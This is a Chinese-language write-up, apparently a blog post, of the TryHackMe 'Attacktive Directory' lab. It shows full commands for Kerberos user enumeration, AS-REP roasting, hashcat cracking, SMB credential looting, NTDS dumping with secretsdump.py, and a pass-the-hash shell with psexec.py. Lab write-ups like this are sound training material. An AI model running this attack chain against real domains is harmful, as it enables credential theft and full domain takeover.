TryHackMe-Attacktive_Directory

Attacktive Directory

99%的公司网络都使用AD。但您能利用易受攻击的域控制器吗?


端口扫描

循例 nmap扫:

53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

enum4linux枚举smb

通过访问3389,我们得知 spookysec.local

Kerberos账户枚举

Kerbrute 发送没有预身份验证的 TGT 请求。如果 KDC 响应错误,则用户名不存在。但是,如果 KDC 提示进行预身份验证,则我们知道用户名存在,我们将继续操作。这不会导致任何登录失败,因此不会锁定任何帐户。

./windows-tools_and_exp/kerbrute userenum -d spookysec.local --dc 10.10.110.53 ./test1.txt

我们发现:

svc-admin@spookysec.local
backup@spookysec.local
administrator@spookysec.local

AS-REP烘培

用户帐户枚举完成后,我们可以尝试使用称为 ASREPRoasting 的攻击方法滥用 Kerberos 中的功能。当用户帐户设置了“不需要预身份验证”权限时,就会发生 ASReproasting。这意味着,在指定用户帐户上请求 Kerberos 票证之前,该帐户无需提供有效标识。

Impacket有一个名为“GetNPUsers.py”的工具(位于/usr/share/doc/python3-impacket/examples/GetNPUsers.py),允许我们从密钥分发中心查询ASReproastable帐户。查询帐户唯一需要的是一组有效的用户名,我们之前通过 Kerbrute 枚举了这些用户名。

新建文件,内容:

svc-admin
backup
administrator

运行GetNPUsers.py

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -usersfile ./test1.txt -dc-ip 10.10.110.53 -no-pass -request spookysec.local/

hashcat爆破:

hashcat -a 0 -m 18200 ./hash /usr/share/wordlists/rockyou.txt

SMB列举

smbclient -L 10.10.110.53 -U svc-admin@spookysec.local

进入backup共享文件夹:

smbclient //10.10.110.53/backup -U svc-admin@spookysec.local

get backup_credentials.txt

里面是base64:

echo "********" | base64 -d

远程转储ntds

3389连进去,开了AV,mimikatz用不了

使用secretsdump.py

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc spookysec.local/backup@10.10.110.53

获得ntlm hash之后我们使用psexec.py来通过pass the hash获得cmd会话

python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes **************:************ spookysec.local/Administrator@10.10.110.53
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值